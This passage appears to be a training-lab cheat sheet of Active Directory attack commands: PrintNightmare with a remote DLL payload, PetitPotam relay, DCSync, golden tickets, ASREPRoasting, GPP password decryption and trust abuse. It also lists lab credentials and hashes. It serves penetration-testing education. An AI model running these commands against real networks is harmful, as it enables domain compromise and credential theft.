| `sudo python3 CVE-2021-1675.py inlanefreight.local/<username>:<password>@172.16.5.5 '\\10.129.202.111\CompData\backupscript.dll'` | Executes the exploit and specifies the location of the DLL payload. Performed from a Linux-based host. |

PetitPotam
| Command | Description |
| --- | --- |
| `sudo ntlmrelayx.py -debug -smb2support --target http://ACADEMY-EA-CA01.INLANEFREIGHT.LOCAL/certsrv/certfnsh.asp --adcs --template DomainController` | Impacket tool used to create an NTLM relay by specifying the web enrollment URL for the Certificate Authority host. Performed from a Linux-based host. |
| `git clone https://github.com/topotam/PetitPotam.git` | Used to clone the PetitPotam exploit using git. Performed from a Linux-based host. |
| `python3 PetitPotam.py 172.16.5.225 172.16.5.5` | Used to execute the PetitPotam exploit by specifying the IP address of the attack host ( `172.16.5.225` ) and the target Domain Controller ( `172.16.5.5` ). Performed from a Linux-based host. |
| `python3 /opt/PKINITtools/gettgtpkinit.py INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01\$ -pfx-base64 <base64 certificate> dc01.ccache` | Uses gettgtpkinit.py to request a TGT ticket for the Domain Controller and save it to a ccache file ( `dc01.ccache` ) from a Linux-based host. |
| `secretsdump.py -just-dc-user INLANEFREIGHT/administrator -k -no-pass "ACADEMY-EA-DC01$"@ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL` | Impacket tool used to perform a DCSync attack and retrieve one or all of the NTLM password hashes from the target Windows domain. Performed from a Linux-based host. |
| `klist` | krb5-user command used to view the contents of the ccache file. Performed from a Linux-based host. |
| `python /opt/PKINITtools/getnthash.py -key 70f805f9c91ca91836b670447facb099b4b2b7cd5b762386b3369aa16d912275 INLANEFREIGHT.LOCAL/ACADEMY-EA-DC01$` | Used to submit TGS requests using getnthash.py from a Linux-based host. |
| `secretsdump.py -just-dc-user INLANEFREIGHT/administrator "ACADEMY-EA-DC01$"@172.16.5.5 -hashes aad3c435b514a4eeaad3b935b51304fe:313b6f423cd1ee07e91315b4919fb4ba` | Impacket tool used to extract hashes from NTDS.dit using a DCSync attack and a captured hash ( `-hashes` ). Performed from a Linux-based host. |
| `.\Rubeus.exe asktgt /user:ACADEMY-EA-DC01$ /certificate:<base64 certificate> /ptt` | Uses Rubeus to request a TGT and perform a pass-the-ticket attack using the machine account ( `/user:ACADEMY-EA-DC01$` ) of a Windows target. Performed from a Windows-based host. |
| `mimikatz # lsadump::dcsync /user:inlanefreight\krbtgt` | Performs a DCSync attack using Mimikatz. Performed from a Windows-based host. |

Miscellaneous Misconfigurations
| Command | Description |
| --- | --- |
| `Import-Module .\SecurityAssessment.ps1` | Used to import the module SecurityAssessment.ps1. Performed from a Windows-based host. |
| `Get-SpoolStatus -ComputerName ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL` | SecurityAssessment.ps1 based tool used to enumerate a Windows target for the MS-PRN Printer bug. Performed from a Windows-based host. |
| `adidnsdump -u inlanefreight\\forend ldap://172.16.5.5` | Used to resolve all records in a DNS zone over LDAP from a Linux-based host. |
| `adidnsdump -u inlanefreight\\forend ldap://172.16.5.5 -r` | Used to resolve unknown records in a DNS zone by performing an A query ( `-r` ) from a Linux-based host. |
| `Get-DomainUser * \| Select-Object samaccountname,description` | PowerView tool used to display the description field of the selected objects ( `Select-Object` ) on a target Windows domain from a Windows-based host. |
| `Get-DomainUser -UACFilter PASSWD_NOTREQD \| Select-Object samaccountname,useraccountcontrol` | PowerView tool used to check for the PASSWD_NOTREQD setting on the selected objects ( `Select-Object` ) of a target Windows domain from a Windows-based host. |
| `ls \\academy-ea-dc01\SYSVOL\INLANEFREIGHT.LOCAL\scripts` | Used to list the contents of a share hosted on a Windows target from the context of the currently logged on user. Performed from a Windows-based host. |

Group Policy Enumeration & Attacks


| Command | Description |
| --- | --- |
| `gpp-decrypt VPe/o9YRyz2cksnYRbNeQj35w9KxQ5ttbvtRaAVqxaE` | Tool used to decrypt a captured group policy preference password from a Linux-based host. |
| `crackmapexec smb -L \| grep gpp` | Locates and retrieves a group policy preference password using CrackMapExec, then filters the output using grep. Performed from a Linux-based host. |
| `crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M gpp_autologin` | Locates and retrieves any credentials stored in the SYSVOL share of a Windows target using CrackMapExec from a Linux-based host. |
| `Get-DomainGPO \| select displayname` | PowerView tool used to enumerate GPO names in a target Windows domain from a Windows-based host. |
| `Get-GPO -All \| Select DisplayName` | PowerShell cmdlet used to enumerate GPO names. Performed from a Windows-based host. |
| `$sid=Convert-NameToSid "Domain Users"` | Creates a variable called `$sid` that is set to the SID returned by the Convert-NameToSid tool for the group account Domain Users. Performed from a Windows-based host. |
| `Get-DomainGPO \| Get-ObjectAcl \| ? {$_.SecurityIdentifier -eq $sid}` | PowerView tool used to check if the Domain Users group ( `-eq $sid` ) has any rights over one or more GPOs. Performed from a Windows-based host. |
| `Get-GPO -Guid 7CA9C789-14CE-46E3-A722-83F4097AF532` | PowerShell cmdlet used to display the name of a GPO given a GUID. Performed from a Windows-based host. |

ASREPRoasting
| Command | Description |
| --- | --- |
| `Get-DomainUser -PreauthNotRequired \| select samaccountname,userprincipalname,useraccountcontrol \| fl` | PowerView based tool used to search for the DONT_REQ_PREAUTH value across user accounts in a target Windows domain. Performed from a Windows-based host. |
| `.\Rubeus.exe asreproast /user:mmorgan /nowrap /format:hashcat` | Uses Rubeus to perform an ASREP Roasting attack and formats the output for Hashcat. Performed from a Windows-based host. |
| `hashcat -m 18200 ilfreight_asrep /usr/share/wordlists/rockyou.txt` | Uses Hashcat to attempt to crack the captured hash using a wordlist ( `rockyou.txt` ). Performed from a Linux-based host. |
| `kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt` | Enumerates users in a target Windows domain and automatically retrieves the AS-REP for any users found that don't require Kerberos pre-authentication. Performed from a Linux-based host. |

Trust Relationships - Child > Parent Trusts


| Command | Description |
| --- | --- |
| `Import-Module activedirectory` | Used to import the Active Directory module. Performed from a Windows-based host. |
| `Get-ADTrust -Filter *` | PowerShell cmdlet used to enumerate a target Windows domain's trust relationships. Performed from a Windows-based host. |
| `Get-DomainTrust` | PowerView tool used to enumerate a target Windows domain's trust relationships. Performed from a Windows-based host. |
| `Get-DomainTrustMapping` | PowerView tool used to perform a domain trust mapping from a Windows-based host. |
| `Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL \| select SamAccountName` | PowerView tool used to enumerate users in a target child domain from a Windows-based host. |
| `mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt` | Uses Mimikatz to obtain the KRBTGT account's NT hash from a Windows-based host. |
| `Get-DomainSID` | PowerView tool used to get the SID for a target child domain from a Windows-based host. |
| `Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" \| select distinguishedname,objectsid` | PowerView tool used to obtain the Enterprise Admins group's SID from a Windows-based host. |
| `ls \\academy-ea-dc01.inlanefreight.local\c$` | Used to attempt to list the contents of the C drive on a target Domain Controller. Performed from a Windows-based host. |
| `mimikatz # kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt` | Uses Mimikatz to create a Golden Ticket from a Windows-based host. |
| `.\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt` | Uses Rubeus to create a Golden Ticket from a Windows-based host. |
| `mimikatz # lsadump::dcsync /user:INLANEFREIGHT\lab_adm` | Uses Mimikatz to perform a DCSync attack from a Windows-based host. |
| `secretsdump.py logistics.inlanefreight.local/[email protected] -just-dc-user LOGISTICS/krbtgt` | Impacket tool used to perform a DCSync attack from a Linux-based host. |
| `lookupsid.py logistics.inlanefreight.local/[email protected]` | Impacket tool used to perform a SID brute-forcing attack from a Linux-based host. |
| `lookupsid.py logistics.inlanefreight.local/[email protected] \| grep "Domain SID"` | Impacket tool used to retrieve the SID of a target Windows domain from a Linux-based host. |
| `lookupsid.py logistics.inlanefreight.local/[email protected] \| grep -B12 "Enterprise Admins"` | Impacket tool used to retrieve the SID of a target Windows domain and attach it to the Enterprise Admins group's RID from a Linux-based host. |
| `ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker` | Impacket tool used to create a Golden Ticket from a Linux-based host. |
| `export KRB5CCNAME=hacker.ccache` | Used to set the KRB5CCNAME environment variable from a Linux-based host. |
| `psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5` | Impacket tool used to establish a shell session with a target Domain Controller from a Linux-based host. |
| `raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm` | Impacket tool that automatically performs an attack that escalates from child to parent domain. |

Trust Relationships - Cross-Forest


| Command | Description |
| --- | --- |
| `Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL \| select SamAccountName` | PowerView tool used to enumerate accounts with associated SPNs from a Windows-based host. |
| `Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc \| select samaccountname,memberof` | PowerView tool used to enumerate the mssqlsvc account from a Windows-based host. |
| `.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap` | Uses Rubeus to perform a Kerberoasting attack against a target Windows domain ( `/domain:FREIGHTLOGISTICS.LOCAL` ) from a Windows-based host. |
| `Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL` | PowerView tool used to enumerate groups with users that do not belong to the domain from a Windows-based host. |
| `Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator` | PowerShell cmdlet used to remotely connect to a target Windows system from a Windows-based host. |
| `GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley` | Impacket tool used to request ( `-request` ) the TGS ticket of an account in a target Windows domain ( `-target-domain` ) from a Linux-based host. |
| `bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2` | Runs the Python implementation of BloodHound against a target Windows domain from a Linux-based host. |
| `zip -r ilfreight_bh.zip *.json` | Used to compress multiple files into a single .zip file to be uploaded into the BloodHound GUI. |
